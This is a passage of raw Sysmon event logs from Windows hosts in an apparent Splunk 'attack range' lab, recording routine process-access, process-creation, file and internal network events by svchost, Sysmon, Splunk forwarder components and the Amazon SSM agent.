11:23:47.211{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222592Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:47.211{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222591Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:47.211{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222590Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:47.211{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222589Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:47.211{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1943-6216-4305-000000003902}528C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222588Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:47.212{4F8D34B0-1943-6216-4305-000000003902}528C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000222587Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:47.124{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-166MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222586Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:46.994{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5A4D96725CF25969D85C6DE19200B9A,SHA256=B5FD8249DA14234271EE56161644E7A76E712E53E0101A7EC8FAE88173A4B41A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298736Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:48.969{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC8A014A35CECD60ADB580CB541E5474,SHA256=F796905430147FAF14FD2F90BC60D0DE910411E728499914D93E788AC8DDC0BE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222617Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:48.991{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1944-6216-4405-000000003902}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222616Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:48.991{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222615Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:48.991{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222614Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:48.991{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222613Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:48.991{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222612Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:48.991{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222611Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:48.991{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222610Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:48.991{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222609Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:48.991{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222608Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:48.991{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222607Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:48.991{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1944-6216-4405-000000003902}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222606Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:48.991{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1944-6216-4405-000000003902}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222605Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:48.992{4F8D34B0-1944-6216-4405-000000003902}1164C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000222604Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:46.138{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51728-false10.0.1.12-8089- 23542300x8000000000000000222603Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:48.133{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-167MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222602Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:48.007{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E815ED8697AECF70D8C437E9C081F86F,SHA256=0D94F41FA238EA4202DFCCF8C8DD026D8CFA3FDD190022D9FFF97E6BADEFDD8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298737Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:49.988{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1882CAC7C82843865DD5C2EF480DA7FF,SHA256=B1F7C1F764F5F3A1022AA2C5504BDA4661F35BAB538ECA8D9561E8B19EEC3BF3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222633Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:49.741{4F8D34B0-1945-6216-4505-000000003902}33122552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222632Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:49.491{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1945-6216-4505-000000003902}3312C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222631Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:49.491{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222630Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:49.491{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|